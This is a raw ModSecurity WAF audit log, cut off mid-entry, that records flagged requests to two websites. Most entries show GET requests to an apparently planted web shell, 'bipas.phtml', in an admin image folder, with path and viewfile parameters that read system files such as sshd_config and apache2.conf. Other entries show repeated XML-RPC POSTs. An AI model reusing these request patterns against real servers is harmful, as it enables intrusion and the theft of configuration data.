Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBrGxwcFb_n1P0IC9xlxgAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750100763111882 719298 (- - -) Stopwatch2: 1750100763111882 719298; combined=2160, p1=345, p2=1405, p3=43, p4=62, p5=193, sr=93, sw=112, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --301b2e59-Z-- --00990313-A-- [17/Jun/2025:00:36:59.267645 +0530] aFBrUxwcFb_n1P0IC9xmGgAAAAo 216.73.216.71 34536 127.0.0.1 7081 --00990313-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fssh%2Fsshd_config.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --00990313-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3281 Connection: close Content-Type: text/html; charset=UTF-8 --00990313-H-- Message: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:path: /proc/self/root/etc/ssh/sshd_config.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:path: /proc/self/root/etc/ssh/sshd_config.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBrUxwcFb_n1P0IC9xmGgAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100819263274 4424 (- - -) Stopwatch2: 1750100819263274 4424; combined=2351, p1=365, p2=1856, p3=39, p4=33, p5=58, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --00990313-Z-- --51af3a6a-A-- [17/Jun/2025:00:37:04.042019 +0530] aFBrVyid3pHxA3RhGpzq7wAAAAk 34.68.37.79 59160 127.0.0.1 7081 --51af3a6a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --51af3a6a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --51af3a6a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (78+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (78+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBrVyid3pHxA3RhGpzq7wAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750100823328744 713332 (- - -) Stopwatch2: 1750100823328744 713332; combined=2389, p1=381, p2=1601, p3=43, p4=75, p5=181, sr=102, sw=108, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --51af3a6a-Z-- --7df7a021-A-- [17/Jun/2025:00:37:32.808483 +0530] aFBrdJlL5_2Zd8wUdfLJ7wAAAAg 216.73.216.71 60168 127.0.0.1 7081 --7df7a021-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsysctl.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsysctl.d%2F10-console-messages.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --7df7a021-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3048 Connection: close Content-Type: text/html; charset=UTF-8 --7df7a021-H-- Message: Warning. Matched phrase "etc/sysctl.d/10-console-messages.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sysctl.d/10-console-messages.conf found within ARGS:viewfile: /proc/self/root/etc/sysctl.d/10-console-messages.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/sysctl.d/10-console-messages.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sysctl.d/10-console-messages.conf found within ARGS:viewfile: /proc/self/root/etc/sysctl.d/10-console-messages.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBrdJlL5_2Zd8wUdfLJ7wAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100852804352 4189 (- - -) Stopwatch2: 1750100852804352 4189; combined=2111, p1=358, p2=1606, p3=32, p4=43, p5=71, sr=104, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7df7a021-Z-- --6300a973-A-- [17/Jun/2025:00:37:35.503733 +0530] aFBrdyid3pHxA3RhGpzrDAAAAAk 216.73.216.71 60556 127.0.0.1 7081 --6300a973-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fapache2&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fapache2%2Fenvvars HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --6300a973-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3847 Connection: close Content-Type: text/html; charset=UTF-8 --6300a973-H-- Message: Warning. Matched phrase "etc/apache2/envvars" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/envvars found within ARGS:viewfile: /proc/self/root/etc/apache2/envvars"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apache2/envvars" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/envvars found within ARGS:viewfile: /proc/self/root/etc/apache2/envvars"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBrdyid3pHxA3RhGpzrDAAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100855499547 4240 (- - -) Stopwatch2: 1750100855499547 4240; combined=2296, p1=347, p2=1821, p3=36, p4=35, p5=57, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6300a973-Z-- --a0e5d449-A-- [17/Jun/2025:00:37:40.055208 +0530] aFBrfCid3pHxA3RhGpzrFQAAAAk 216.73.216.71 59990 127.0.0.1 7081 --a0e5d449-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fssh%2Fsshd_config.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --a0e5d449-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2827 Connection: close Content-Type: text/html; charset=UTF-8 --a0e5d449-H-- Message: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:path: /snap/core20/2599/etc/ssh/sshd_config.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:path: /snap/core20/2599/etc/ssh/sshd_config.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBrfCid3pHxA3RhGpzrFQAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100860051461 3810 (- - -) Stopwatch2: 1750100860051461 3810; combined=2010, p1=341, p2=1546, p3=36, p4=28, p5=59, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a0e5d449-Z-- --3326a176-A-- [17/Jun/2025:00:37:41.877285 +0530] aFBrfY3q6eGJ2xNcTd6H3AAAAAU 216.73.216.71 60202 127.0.0.1 7081 --3326a176-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fmodules-load.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fmodules-load.d%2Fmodules.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --3326a176-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3106 Connection: close Content-Type: text/html; charset=UTF-8 --3326a176-H-- Message: Warning. Matched phrase "etc/modules" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/modules found within ARGS:path: /proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/modules" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/modules found within ARGS:viewfile: /proc/self/root/etc/modules-load.d/modules.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/modules" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/modules found within ARGS:path: /proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBrfY3q6eGJ2xNcTd6H3AAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/modules" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/modules found within ARGS:viewfile: /proc/self/root/etc/modules-load.d/modules.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBrfY3q6eGJ2xNcTd6H3AAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100861873354 3984 (- - -) Stopwatch2: 1750100861873354 3984; combined=2233, p1=331, p2=1742, p3=38, p4=30, p5=91, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3326a176-Z-- --8683455d-A-- [17/Jun/2025:00:37:46.532282 +0530] aFBrglJfblPUQiSn5r1ipwAAAAA 216.73.216.71 60762 127.0.0.1 7081 --8683455d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsysctl.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsysctl.d%2F10-network-security.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --8683455d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3096 Connection: close Content-Type: text/html; charset=UTF-8 --8683455d-H-- Message: Warning. Matched phrase "etc/sysctl.d/10-network-security.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sysctl.d/10-network-security.conf found within ARGS:viewfile: /proc/self/root/etc/sysctl.d/10-network-security.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/sysctl.d/10-network-security.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sysctl.d/10-network-security.conf found within ARGS:viewfile: /proc/self/root/etc/sysctl.d/10-network-security.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBrglJfblPUQiSn5r1ipwAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100866528297 4041 (- - -) Stopwatch2: 1750100866528297 4041; combined=2225, p1=343, p2=1766, p3=31, p4=34, p5=51, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8683455d-Z-- --e9f9d365-A-- [17/Jun/2025:00:38:04.059274 +0530] aFBrkxwcFb_n1P0IC9xmaQAAAAo 34.68.37.79 38760 127.0.0.1 7081 --e9f9d365-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --e9f9d365-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e9f9d365-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBrkxwcFb_n1P0IC9xmaQAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750100883337758 721572 (- - -) Stopwatch2: 1750100883337758 721572; combined=2153, p1=414, p2=1359, p3=43, p4=63, p5=171, sr=141, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e9f9d365-Z-- --30adfd12-A-- [17/Jun/2025:00:38:28.103424 +0530] aFBrrH3hoSwVUy254pH1ZAAAACQ 216.73.216.71 42222 127.0.0.1 7081 --30adfd12-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fapache2&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fapache2%2Fapache2.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --30adfd12-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 6086 Connection: close Content-Type: text/html; charset=UTF-8 --30adfd12-H-- Message: Warning. Matched phrase "etc/apache2/apache2.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/apache2.conf found within ARGS:viewfile: /proc/self/root/etc/apache2/apache2.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apache2/apache2.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/apache2.conf found within ARGS:viewfile: /proc/self/root/etc/apache2/apache2.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBrrH3hoSwVUy254pH1ZAAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100908098327 5155 (- - -) Stopwatch2: 1750100908098327 5155; combined=2559, p1=390, p2=2035, p3=37, p4=40, p5=56, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --30adfd12-Z-- --00054143-A-- [17/Jun/2025:00:38:33.653702 +0530] aFBrsY3q6eGJ2xNcTd6IFAAAAAU 216.73.216.71 54660 127.0.0.1 7081 --00054143-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d%2Fgawk.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --00054143-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3185 Connection: close Content-Type: text/html; charset=UTF-8 --00054143-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/gawk.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBrsY3q6eGJ2xNcTd6IFAAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/gawk.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBrsY3q6eGJ2xNcTd6IFAAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100913649590 4166 (- - -) Stopwatch2: 1750100913649590 4166; combined=2353, p1=329, p2=1861, p3=40, p4=33, p5=89, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --00054143-Z-- --2de49a08-A-- [17/Jun/2025:00:38:35.839118 +0530] aFBrs5lL5_2Zd8wUdfLKQgAAAAg 216.73.216.71 54924 127.0.0.1 7081 --2de49a08-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Finit.d%2Fkmod HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --2de49a08-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3874 Connection: close Content-Type: text/html; charset=UTF-8 --2de49a08-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2599/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2599/etc/init.d/kmod"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2599/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBrs5lL5_2Zd8wUdfLKQgAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2599/etc/init.d/kmod"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBrs5lL5_2Zd8wUdfLKQgAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100915834541 4631 (- - -) Stopwatch2: 1750100915834541 4631; combined=2368, 